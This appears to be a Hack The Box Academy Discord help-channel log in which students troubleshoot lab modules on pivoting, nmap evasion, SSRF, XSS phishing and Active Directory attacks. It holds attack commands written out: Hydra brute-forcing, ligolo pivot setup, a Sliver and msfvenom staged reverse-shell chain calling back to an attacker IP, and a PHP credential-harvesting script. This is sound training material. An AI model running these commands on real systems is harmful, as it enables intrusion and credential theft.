add it to your hosts file?
You are not root
i got it i was using sudo..
i have to switch to root by sudo su then do it
Thanks man
Hi guys, I'm having issues with the Skill Assessment of the Pivoting module. Is there anyone which can help me sort it out?
I am basically stuck when trying to enumerate the available networks. As far as I could read online I'm supposed to be able to ping a given machine, but it seems like I cannot reach it. I don't get whether I'm forgetting something or if I'm in an edge case which for some reason doesn't make it work
Hello,
any help on this?
i cannot reach the internal network
Crackmapexe skills assessment https://academy.hackthebox.com/module/84/section/1747
chisel works just fine with other modules
https://academy.hackthebox.com/module/9/section/1583
Hello everyone, could someone assist me with those modules?
A question appears in that module.
"What are all the methods available to remotely access Windows operating systems?"
If we go straight to Google, we will definitely find the solution to that query. But why go for extra mile and connect each component? The answers stay the same.
What is your question?
Why should we apply Relationship-Oriented-Questioning (ROQ) model?
I have a little problem choosing the right list for Web FUZZING skill assessment.
I tried to hard set one of the args as an id or FUZZ both with the small lists. I replaced those in the command below to avoid giving out answers here, but the long list runs longer than my server stays up, so I think I am meant to use one of the short ones. Those, however, don't get me a flag. Is something with the command wrong or what list might I need to use?
ffuf -w ./cirt-default-usernames.txt:FUZZ -u 'http://faculty.academy.htb:52010/courses/endpoint.extension' -X POST -d"arg1=0&arg2=FUZZ" -H 'Content-Type: application/x-www-form-urlencoded' -fs 774,781
Apologies, ran the longest list again and found the answer. Should have been more patient.
hello, I have a question about sql injection module. I don't understand this. Since the AND operand is evaluated before, this does not make sense to me. Wouldn't it be the same result with '1'='2'?
Yeah... that might be a typo but you could prove it easily by trying out the sequence of queries in the lab.
I would encourage you to try. But, yeah, you're not the first one to have their mind warped by that assertion.
Need help with Skills Assessment - Hard in Abusing HTTP Misconfigurations module
https://academy.hackthebox.com/module/17/section/64
for the question number 3 have i done it correctly?
thank you
I found the parameter for XSS, poisoned the cache but it doesn't seems to impact the verification bot, I tried to steal the session cookie and calling http://httpattacks.htb/admin/promote?uid=2 using my XSS payload but nothing works
one more thing, how do you hide text (shown when you click on the black box) here in discord?
@rapid fog @dapper moth @spring lily
So from what I understand memory works best when you're relating "things you're learning" to "things you know". Someone else may have a better answer for you, but those meta-modules are abstract so, they're very much a take from them what you will.
There was actually a great radio broadcast I caught the other week with an academic that studies how memory works upon which I'm basing this answer. If you wanted to hear more on the topic it's worth a listen and some notes:
https://hiddenbrain.org/podcast/remember-more-forget-less/
Make sure you close your tags and check the messages in the debug console
but it works locally
Double pipes in front and after the text
can i solve it with wpscan and visit the url plugins?
but i still cannot find the flag
There are some good hints in the forum post
@fathom pendant can i dm you directly?
I got it, thank you
Finally solved
Hello, can someone help how to get a reverse shell for the AEN Web Enumeration & Exploitation. The Web shell that I got after getting the creds is limited from commands and with burpsuite unable to make the correct payload
got it or still stuck?
for the first time in htb i feel really lost, i'm reading the Footprinting DNS module and just can't get my head around it. someone here have some good other resources i can try to understand DNS ?
i'm trying this already yes
i thought i do but now i'm doubting
DNS simply resolves a hostname into an IP address
I've figured it out thx
ok so i'm not completely lost, i'll try to do the lab and read more about it. My difficulty is more in the understanding of the different file (zone files etc...) thanks man
Zone files contain mappings of domain names to IP addresses, among other DNS records.
not that complicated
You could watch a video on DNS to supplement your understanding 🙂
sometimes you just need to go over it a couple of times
Module: AD Enumeration & Attacks - Skills Assessment Part II
Question: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I want to add a certain user to a certain group, I want to do it using powerview, but somehow it is not working correctly. I do not understand what is wrong, as the first command works the second one does not work
I was initially using an evil-winrm shell, I thought there was some issue with that, but same issue happened using rdp
ok this is a bad example, i tried Find-InterestingDomainAcl also
did not work
here is the correct command
looks like a different error, now you're missing parameters
I'm trying to get my double pivot to work, I setup a listener and stuff but I can't get it working
Yes you right
Make sure you actually have the PowerView.ps1 script dropped onto the target and imported before you attempt this.
Pro tip: I did this completely filelessly
What you pivoting with
ATKBOX -> ubuntumachine -> Windows -> (internal network)
What tool
ligolo
I have my tunnel, setup my second interface, added my listener
but when I connect no new session
Try using the 240.0.0.1 IP address and see what happens
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
.\agent.exe -connect INTERNAL-PIVOT-IP:11601 -ignore-cert
For the second layer of pivoting, replace 127.0.0.1 with 240.0.0.1.
okay trying now
Yeah that should work
Are you getting errors or it’s just not connecting?
just not connecting
It must be the ip then
which module is this
Another thing: check your firewall settings. If you're using a local machine to attack and not the PwnBox, you could have connections being blocked, as I had to learn the hard way
these are the interfaces
```
ligolo: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500
        inet6 fe80::3185:eae8:5c78:6a8c  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 36413  bytes 7082622 (6.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28949  bytes 10454709 (9.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ligolo1: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```
I'm using pwnbox
AEN
Dm a pic with the ips
Hey I just joined kinda watching the show it’s crazy how much u guys support each other and u I fuckin respect that
Anyways I’m tryna get into hacking what some basic stuff I need and I also need a mentor I’ll pay for lessons
This is the typical page people link to when someone like yourself asks for a place to start:
https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thank you
Professionally maybe you can find yourself a mentor, but as for the technical education -- as you've brought up -- you will learn everything you need with your own reading and by learning to ask good questions of the community who is happy to help.
Thank you I really appreciate that
you read it wrong, they mean that its imported from another file
you have to read that imported file
ahh
is there mods on this servers?
are you about to drop smth?
it's config.php right?
idk, just check either way
What is it about?
Any help for Advanced XSS and CSRF exploitation skills assessment? Can bypass samesite cookie restriction to the main domain but seems like it’s refusing to send with the subdomain
happy sunday everyone. i had a question about the Windows Attacks and Defense regarding the Kerberoasting. when i try to connect to the kali attack box via ssh it keeps giving me a connection refused message. is there something im missing?
probably firewall
on my end or the freeRDP target ip?
wait what attack box
looks like it's just a windows box isn't it?
use the pwnbox or your vm?
pwnbox
yeah or you can RDP into it
you can kerberoast from linux but this module doesn't cover it i think, just from windows
so you'll want to RDP into the machine with your pwnbox
which i did
so what's the issue
well it asks me to share the outfile that has the results from the kerberoasting to the kali box. doesnt mention anything about pwnbox.
if you're not using your own kali vm you can just use the pwnbox (parrot) instead
ok. so basically substitute kali for pwnbox. thank you. was a little misguided on this one
yeah. if you add /drive to your xfreerdp command you can also easily share a folder. like /drive:/home/supernuts/desktop
oh my lord you made that 10x easier. thank you
if you aren't doing it also try out /dynamic-resolution
yup just tried that. i copy most of the commands that htb provides. its alot easier on the eyes now lol
Guys I need help in the Firewall and IDS/IPS Evasion - Medium Lab (Network Enumeration with Nmap)
I tried every possible command even commands I found on the forum
Nothing appears to solve it for me
Is this normal?
I cant remember the Module 100% anymore, but DNS is probably UDP. So did you check UDP, too?
Yeah I checked it
I literally got commands that solved it for some people yet it didnt solve it for me lol
just checked it, works
did you use Options to fingerprint the Port?
pay close attention to the Output then
have you tried to look if there is some NSE scripts that could be helpful ?
I tried the following:
nmap -Pn -T4 -A -v -sV 10.129.57.157 -p 53 -D RND:5 --stats-every=5s
nmap -sV --version-intensity 9 -p 53 --script dns-service-discovery 10.129.2.48
nmap 10.129.2.48 -p53 -sV -Pn -n --disable-arp-ping --packet-trace --script banner
nmap 10.129.2.48 -p53 -sS -sV -Pn -n --disable-arp-ping --packet-trace
I also added the -sU
DM me
What part is unclear?
hey did anyone have a problem with server-side attacks instance, mine instance for ssrf doesnt work
Have you tried changing the TCP flag? Try following the same steps in the evasion section
You are clearly just scanning one port with this
Of course it is
Try following the steps in the evasion section
It is the exact same thing
```
Host: 10.129.63.227
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

dateserver=http://127.0.0.1/&date=2024-01-01
```
did exact same thing as in the identifying ssrf section, am i missing something or what?
is there by chance some sort of cli imap client I can easily fire up that ships with pwnbox? I've done the modules on manually accessing mail and whilst I'm glad to have learnt it, there's got to be an easier way
netcat?
it works with openssl s_client. It just feels like there'll be some more convenient imap_all_mail_downloader.py sitting there i won't know about unless I ask.
currently on the attacking SMB module and I have the username and password of who I need to login with via SSH however I keep getting denied saying I have a public key and I never get prompted to put in a password
You might want to check out ssh's -o option and... uh... the PreferredAuthentication option maybe. You'll have to google it, but you can tell SSH that you want to auth with a password. I don't know if that's your solution, but it's the first thing that comes to mind.
I just looked in the manpage and it seems like you would be correct, my excercise requires me to ssh to find the flag.txt
there's another one too, PubkeyAuth I think. It's like something I need to do once a year so I just always google it: force ssh password auth
or man page it. that's smart.
what do I type exactly after -o?
yea, I dunno because it's one of those arguments that takes a huge string as an argument
😭
hmm we may be onto something here
i'm trying to do this windows lab with rdp but the windows box isn't connected to the internet lmao what do i do
why do you need to connect it to the internet
file transfers
can you just transfer it from your vm/pwnbox that already has internet?
no i'm trying to abuse certutil.exe but for some reason it will not connect to my vm
or uh
certreq
can you ping the target
no i'm trying to abuse certreq.exe but it will not connect to my kali vm
the point of the lab is to try to transfer files in specific ways, not just any way
sorry really confused first you said the windows box couldn't connect to the internet, then you said it couldn't connect to your vm but you were able to rdp so it does connect.. then you wanted to file transfer, but not that way
still really confused as to what exactly you're trying to do
best to say what module and section and question you're on
file transfers - living off the land
ok so the way you transfer files using certreq.exe is you use it to send a POST request to a netcat listener but it won't connect to my netcat listener because it's not connected to the internet
everything should work fine as long as your on the vpn
the remote machines dont have internet
ok then i have no idea what's going on because i keep timing out every time i try to connect from the remote machine back to my kali vm
your kali machine can ping it right?
yeah i can rdp just fine
what error are u getting?
it might be the module tbh, ive seen some people have problems with this method too
ok looks like i got it, i just had to connect to the tun2 address on my kali vm because tun1, tun0, and eth0 weren't working
i assume tun2 is probably the rdp connection which would make sense
unless i know nothing about networking and it doesn't make sense
i know the 3 tuns are from openvpn
3 tun interfaces is kinda odd
yeah idk why i had 3
you should usually have only tun0
usually i do
yeah not sure what happened there but its solved now
will remember that
you might have multiple OpenVPN instances
should probably sudo killall openvpn
then reconnect to the VPN
what calculac0re said... those are network adapters not services (like rdp)
Anyone available to give me a nudge on Broken Authentication - Skills Assessment? I have the ||username and password|| and I read that ||brute-forcing the otp|| is not the right path.
maybe try a different way then
I have looked at ||the two bypass techniques discussed in the modules|| but no luck so far. Any hint?
you're on the right track
anyone free to dm, stuck on icmp tunneling with socks section of pivoting tunneling and port forwarding
I see how one of the ways may work, but I am still stuck. May I DM you?
there's not much more i can say really
nvm i killed my port forward by accident
DM if you still need assistance
Help received, deleting the original message - as it is not related to modules
guys my cherry tree file got corrupted please tell me there's a way to fix
Yeah sure dm
im running nmap but my output is looking different than the example:
```
nmap --script smb-os-discovery.nse -p445 10.10.10.40

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 00:59 GMT
Nmap scan report for doctors.htb (10.10.10.40)
Host is up (0.022s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
```
thats what the webpage looks like but this is my result:
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:56 EDT
Nmap scan report for 10.129.121.141
Host is up (0.48s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds
```
so im missing the host script results. im running this on a kali vm instead of parrot that pwnbox uses. would that affect the display results?
Hello can someone help please how do u crack this "hexadecimal plaintext" that I got in the AD module from the LSA Secrets of the crackmapexec output:
INLANEFREIGHT\ACADEMY-EA-DC01$:plain_password_hex:8fb2ee679171183b03424facf77f129bd2646961989352bd4c19dc1791aac80d396afd390409971495d83cf022140052fa430dcbce392b0ce5cdb2e3000c4cbf92d592987a8e7b78e4ea302bda48e0390878d0f550efaa15966bb61810a21ca27263e4e81941e0bb8d522a0521501e052f93ed6e47d1674c4cc835395204248f6b4d13fbb680facd43089ed2790926ee34fce1da66abcd7f7fae23c277fa7b7ed4b700976c61e17d3c2e25564f74b2218935c68d42dcee6ca642de87c9cdc77c8f3c6fd7973e62b52fd23ffc3adef2ed238cfdb94b2563c0ce4422d25a48fde3c161bb8a2d57266a9545f8e44e0462a2
Please @ me if you have any idea about this . Someone said it may be a service account and then u can use an attack to get authority system ?
for this exercise "attacking email services" I managed to grab the email address and password that I needed but I cannot figure out how to log into the email address using the command line. I need to login through smtp specifically
not sure what part you're on since you didn't say but cracking that is not the right path.
I understand sir but I am not trying to follow the path, I make my own path. Do u have any input on the matter that I asked about?
i did give input on the matter you asked about. it's the wrong way to do it.
Can I Crack that or no
i already told you that you can't do anything with it
why do you need to crack it? when you dump lsa you would've gotten the machine account's NTLM
.
if you have that, then you should have the NT hash of the computer account
either way machine account passwords are not crackable
But i dont have nt of acct user i just got this from CME "LSA Secrets" output... Im just trying to learn how to use this
you don't
Hey guys I need your help
go on
I need to get several video from a website I need the best quality
still stuck on this, logging in through telnet isn't giving me what I need
???
no one here can help with that. this discord is about the hackthebox platform.
You didn't mention which module or section so gonna be hard to help, but try an email client maybe? just connect it.
It's week 6 "attacking common services" "attacking email services" specifically the SMTP section
idk if it has a different name for you, this is just how it shows up for me
what's the email client in our pwnbox?
re-read the section it goes over how to read email
I ain't gonna lie, I haven't been able to see where it says that I've gone up and down it for hours now
choose whatever email client you like
if you did the footprinting module that also shows you some ways
where? I'm not seeing anything
also the email client did not work
#cdsa Hi, I am facing an issue connecting to the lab for the "Packet Inception, Dissecting Network Traffic With Wireshark" section. I tried RDP for the lab from Pwnbox, but the lab OS shows a black screen. Has anyone faced this issue before? As far as I am concerned, no history was found in support for the issue.
press space bar on the black screen
Hi, thanks for the response, i tried the space bar , it is still not working
where did you find this
Center left third of the screen, click around there, there's a button.
Can anyone tell me what is the best way to protect my website from CSRF. Some of the options that I’ve considered (or a combination of) are below. I want to fully support older browsers as much as possible (That means not fully relying on CORS preflight, I guess). Any suggestions are much appreciated. Thanks
- Disallow simple content types
- Custom header
- Double submit cookie
- Synchronizer token pattern
hi buddy did u solve it? I'm in the same spot, i have the port and i try medusa but it is not working.
anyone know how to fix this?
did the same thing as in the section, and it just keep saying waiting and then no route to the host
anyone to help?
nc listener is not a http server. try making a python3 http server and see if you get a hit.
idk why but last night it didnt want to work for 2 hours, i did the exact same things, and suddenly now it works
with the http server?
with netcat
yeah
well if it works it works
i think it doesnt matter for testing out ssrf, nc only listens for incoming data no matters what
yhyh thanks anyway
also whenever i try to interact with the dll it just deletes itself? anyone know why
This is the wallpaper, nothing wrong with the machine
Make sure you've disabled defender and its functionalities
yeah i checked defender and i think its disabled by default for the modules, im having a break now so ill have a look again later.
I'm doing the API Attack module on Unrestricted Resource Consumption Section. I'm a bit lost on the question
" Exploit another Unrestricted Resource Consumption vulnerability and submit the flag."
The hint say "Focus on the POST /api/v1/authentication/customers/passwords/resets/sms-otps endpoint." but I dont know what I can do with that reset
nvm I have solved it
┌─[us-academy-5]─[10.10.14.124]─[htb-ac-1163718@htb-sed4nrlnoa]─[~]
└──╼ [★]$ xfreerdp /u:Administrator /v:10.129.13.80 /p:AnotherC0mpl3xP4$$
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-1163718/.config/freerdp
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-1163718/.config/freerdp/certs]
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-1163718/.config/freerdp/server]
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.129.13.80:3389)
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.129.13.80:3389 (RDP-Server):
Common Name: MS01.inlanefreight.htb
Subject: CN = MS01.inlanefreight.htb
Issuer: CN = MS01.inlanefreight.htb
Thumbprint: 0c:41:a7:8d:23:e4:45:90:b3:e9:95:4b:32:ea:2c:2b:2a:ee:2b:66:d5:df:4b:21:32:6b:67:8b:51:97:aa:9b
is it just me encountering this on password attacks module?
nvm, it worked on rdesktop lol
Where is the correct place to ask for help with a module?
I have searched previous questions and answers regarding the issue I am experiencing and others have had it as well
I cannot find an answer however for my issue
this is the place
ok, so I am working on Footprinting SNMP, final check using snmpwalk, snmp-check etc and I get target timeout using pwnbox or my own vpn connections, UDP or TCP
I have tried setting the -t25 and it does not matter
I have spawn 4 targets and none of them respond to those tools following demonstrated solves
searching for this in Discord shows I am not alone in experiencing this
Are you using the correct community string
Sorry, not using nmap brute-force script
I have tried that as well, it times out
this result is from using snmpwalk -v2c -c public -t25 -r2 <ip addr>
works for me
yeah, I think there is some other issue that I am not detecting
https://academy.hackthebox.com/module/17/section/64
to obtain a shell can we get it from theme editor?
Hello After completing a module what can you do to keep practice and increase knowledge? Pentesting job role path
You can find content that contains knowledge from X, Y and Z modules - https://academy.hackthebox.com/academy-lab-relations
and practice
Do i need subscribe to labs to get access to it?
hello i need help in [Exploiting Web Vulnerabilities in Thick-Client Applications] its my last flag
i am confused the link you gave me what for? is it for showing CTFs machine related to the module?
right, you can practice the knowledge from the modules across machines, fortresses, prolabs etc
okay i selected module : Network Enumeration with Nmap. i found easy machine shoppy i clicked on it nothing happen. sorry i don't know what to do i never seen this page before.
Oh if you wanna do the machine, you need to get on labs and search for shoppy.
so i can't do any machine practice if i have academy access only?
This is the right approach, select a machine, and then check out what knowledge would be required to be solved. The modules will contain the skills needed, and you can practice
Academy and labs subscription is separate. You can do the machine for free if it's active. Retired machines require a sub.
i need help
Thank you
With what
when working with things like that click about and find where you can alter things, if you have never used it before get used to it as it may appear again especially in CTFs. How can you get that page to behave how you want it to.
hello i need help in [Exploiting Web Vulnerabilities in Thick-Client Applications] its my last flag
Yo yo
On the Linux Pass the hash module
We can see here that we have some cache files
```
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_qMKxc6
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 10:43 krb5cc_647401107_O0oUWh
-rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct 7 11:21 krb5cc_647401109_D7gVZF
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Oct 7 11:35 krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 7 11:01 krb5cc_647402606_ZX6KFA
```
and the module wanted to use julio
Importing the ccache File into our Current Session
```
root@linux01:~# klist
klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB
```
but where did this `/root/krb5cc_647401106_I8I133` come from? is that an accident
malware
ask in #1263635449335910531
I don't have access to that. how do i access that chat
Hey guys, i use onenote for my notes, do you know a manner for doing like a snapshot of it? We never know what can happen and if i lose them all my work will be gone
Hello. I need help with Repeating Requests. I am attempting to capture a flag. I'm 90% sure I've already got it, but it is not accepting my answer.
make sure u submit an answer free of spaces
Please don’t post the request/flag as this is spoiling the module
and dont post answers next time pls 😄
Okay, I apologize. I didn't intend any spoilers
No problem 😌
There are no spaces or anything. I am okay with just passing over as long as I'm not missing anything
lemme check the module, 1 second
Okay, thank you
what section?
Using Web Proxies
Hello, I encounter the error:
clCompileProgram(): CL_COMPILE_PROGRAM_FAILURE
error: unknown target CPU 'generic'
- Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed
when attempting to run hashcat from the machine I'm asked to ssh into (Module : AD enumeration and attacks, section LLMNR/NBT-NS Poisoning - from Linux)
Is it a driver issue on the side of the VM?
yeah, what section is it? (one from the list on the right)
im assuming intercepting web requests?
aha
read what the question wants from you, what you submitted was a flag for a previous section 😉
SSH for Windows in Pivoting, Tunneling, and Port Forwarding room: plink.exe section, I don't quite understand what to do, where is the windows attack host?
Ah! Okay. Thank you, @shell ore ! I'll do some digging and see what I can do
Solved. Thanks again!
Hello
Hi
I managed to get the flag by using hashcat locally instead of on the VM side, but it's still kinda inconvenient lol
always use hashcat in your host
I’m sorry but what module are you talking about?
I don't want to subscribe to the $8 monthly plan but I can't choose it
Hey everyone,
I’m encountering issues with Login Forms on Login Brute Forcing module and I think I’ve set everything up correctly. Here’s the Hydra command I used:
||hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 41425 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 60||
This is the output I got:
[DATA] max 60 tasks per 1 server, overall 60 tasks, 3400 login tries (l:17/p:200), ~57 tries per task
[DATA] attacking http-post-form://83.136.254.47:41425/login.php:username=^USER^&password=^PASS^:F=<form name='login'
1 of 1 target completed, 0 valid password found
Despite running the attack, no valid passwords were found. Can anyone provide some guidance or hints on what might be wrong? Any help is appreciated!
You want to or don’t want to subscribe to it?
yeas
If you wish to subscribe to it, follow this: https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription
thank you
What is the total cubes that will be rewarded back to you by completing it? Tier 0 Free
Tier 0 = you get all cubes back
Other tiers can be found here: https://help.hackthebox.com/en/articles/5272936-introduction-to-htb-academy#h_6ac6f773e1
No understand, it's question in Hack The Box
Hello, in the 'MSSQL, Exchange, and SCCM Attacks' module on 'SCCM Site Takeover I' section i can not relay. It says connection refused .
+ 2 This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?
Does the DOS attack disclosed here work on the exercise at the end? It prompts you to try so i figured it will, but havent managed to do it
Check my link:) it will tell you the answer
Thank you, very nice
any chance you could assist me with the "Using CME Skills Assessment"
im stuck on question 2. I have gotten the A**l user and passwd, I have run mssql queries through proxychains and outside of it just trying to enumerate more, but I think im either missing something or im not looking at the right db table... any breadcrumbs would be greatly appreciated.
Hello. Can someone help me with a question? I'm at Linux Fundamentals > System Information and i don't know how to answer " Which shell is specified for the htb-student user?". How do i do this? No one ever told me this, how am i supposed to know this? I looked on the internet and all the results are different and none are working.
echo $shell
Nothing happens
Though echo $0 whatever this means displays that it's bash, but when i enter bash as answer it says incorrect
Hm weird
Oh the correct answer is path to it for some reason
How do I get HTB Academy as cheap as possible?
Win a gift voucher
There was a student plan, is that still available?
Step by step guide on how to access the Student Plan.
check the shares
Oh my student email was deleted by college, lol
I have .. and I only have read access on all of them.. everytime I spider them, or try read into them I dont get a response other than im able to authenticate. ... I feel like im missing another user to be able to properly authenticate ..
Can I only use HTB for preparation of OSCP?
disregard my other message ....
of course now it works lol 
Hey guys can someone help? I tried to use the --ignore-certificate but it dont work
try putting password in ' '
How can I start my htb journey?
got disconnected and dont work anymore ^^
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Anyone had the same problem in the past? First i can connect then it disconnects me and gives me this error
same problem on pwnbox
Try a tcp academy vpn
Im trying to do the linux fundamentals but i cant even ping inlanefreight.com i get 0 responses
In the filter contents section btw
When i ping inlanefreight.com (134.209.24.238) i get 63 packets transmitted, 0 received, 100% packet loss, time 63825ms while using the website virtual machine
hi i want to report a bad module author
Objective: To use the stager, we would need to create a profile, a stage-listener, and a stager without forgetting to generate a payload through msfvenom
The module author instructs to use msfvenom to create staged shellcode which uses port 8088 when according to the sliver documentation (https://sliver.sh/docs?name=Stagers),
"# LHOST and LPORT should correspond to the --url parameter of your stage-listener command"
where the author's previous instruction using stage-listener implements a conflicting port, 4443.
e.g. stage-listener --url tcp://10.10.15.107:4443 --profile htb followed by msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.107 LPORT=8088 -f aspx > sliver.aspx
The correct order for functioning callbacks would be:
```
profiles new --http 10.10.14.62:8088 --format shellcode htb
stage-listener --url tcp://10.10.15.107:4443 --profile htb
http -L 10.10.15.107 -l 8088 --website delivery
generate stager --lhost 10.10.15.107 --lport 4443 --format csharp --save 4443.txt
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.107 LPORT=4443 -f aspx > sliver.aspx
replace new byte from sliver.aspx with 4443.txt
upload file
..
profit: [*] Session 0587c760 LIGHT_WORKBENCH - 10.129.205.234:49680 (web01) - windows/amd64 - Mon, 07 Oct 2024 13:36:00 EDT
```
please may i have some more QA
author likes to link the documentation a lot but doesn't follow the instructions from it when teaching.
I am not understanding how to use the command to pull up the vpn in this module, thank you for the help in advance
If you're on the pwnbox you shouldn't need to use the VPN, you should already have a tun adapter
but also you're trying to use an .ovpn file that doesn't exist
Read through the output "error ... no such file or directory"
thank you, i see i am on a vpn on the right hand corner, why does it tell me to connect to a vpn: type sudo open user.ovpn but when i do no such file exist i thought it was a module or command i was to learn?
I'm unfamiliar with the module you're on, but it's probably going over instructions for people who are running kali or another pentesting distro locally or in their own virtual machine.
I wanted to learn the command in case I needed it in a future module but I feel like I dont know how to use it or pull it up or even why it doesnt work, i was wanting to get some clarity on those thoughts
its the literal basic tutorial lol
getting started
well you should first understand what openvpn is. It basically connects you to an OpenVPN server aka allows you to access HackTheBox hosts/machines/resources.
If you stick with the pwnbox the VPN is entirely unnecessary. The pwnbox isn't great; it is convenient, but can be finicky, so most people prefer using a local installation of kali or whatever. That's something worth exploring sometime on your own, getting that sort of thing setup.
you will need to know how to connect using VPN when you setup a Lab of your own. As long as you are on PwnBox (the machine on cloud provided by HTB) you won't need to worry about it. Also, I believe it would be better if you focus on Information Security Path first as it provides foundations for almost every path in HTB.
ok, ill check that out then thank yall
I tried remmina
Remmina works like charm
Btw guys where can I practice for eJPT (apart from the INE labs)
Sorry for disturbing. I am having trouble finishing a section and could use a hint.
Module: Cross-Site Scripting (XSS)
Section: XSS Attacks - Phishing
I am trying to solve the task.
- I started the target.
- I went to the URL IP/phishing and found a working payload to inject the example JS and HTML Code onto the site (adjusted with my IP where the script for fetching the credentials is running).
- I started the example PHP script/server
- I tested the connection and could retrieve the login credentials
- I copy and pasted the new URL into another tab and tested again -> it worked
- I visited the IP/phishing/send.php site and entered the URL into the input field and receive the message "Issue in sending URL!"
I tried adjusting the php script to receive POST requests. And also tried to intercept the responses with Burp and adjust the form but since I am not successful I am either doing something wrong trying to do that or I am going further into a complete wrong direction.
I don't expect a solution. If possible just a hint, that could push me into the right direction.
Double check that there are no mistakes in the script you are sending
did you use the example from the module?
Hi guys, I'm new here. Nice to meet y'all
Kind of messed up and ran finalrecon with the dir flag on http://inlanefreight.com instead of http://inlanefreight.htb
The only saving grace is that I got a 301 instead of 200 (cause the webserver tried to redirect for https)
I'm kind of panicking. Am I screwed?
Hi guys, i some understand there what i need to write in a placeholder, i have a flag'
here i cant to send prtntscr photo?
you mean the script that is running on my "server"/attack machine? or the payload that I try to inject ?
I tried taking a look at those, but I should probably take a break first and check again later. Am trying for a few hours now without any success.
I have a question "As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable."
and i place in placeholder deobfuscated "code "flag='HTB { n'+'3v3r_'+'run_0'+'bfu5c'+'473d_'+'c0d3!'+' } ' "
and this answer is incorrect
The payload. But you might aswell check both. If you copied the one from the module then it should be fine. Taking a break is probably a good idea
yes I am using the script that was shown in the module
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?>
you added the server IP right?
yes I added it. that was now just copy pasted from the module.
When I send the credentials from IP/phishing/ the server receives the credentials
hi everyone,
I'm reading the CVSS section under Vulnerability Assessment, and it mentions CVSS as "Risk Scoring".
This should be "severity rating" and not a risk-score. CVSS user guide itself mentions that it's not a risk metric. I feel this should be updated/changed.
I believe that goes in #1234357888114364508
thank you for the hint!
I'm relatively new to Discord.. I will post it there.
That script isn’t needed, I’m talking about the html and js example
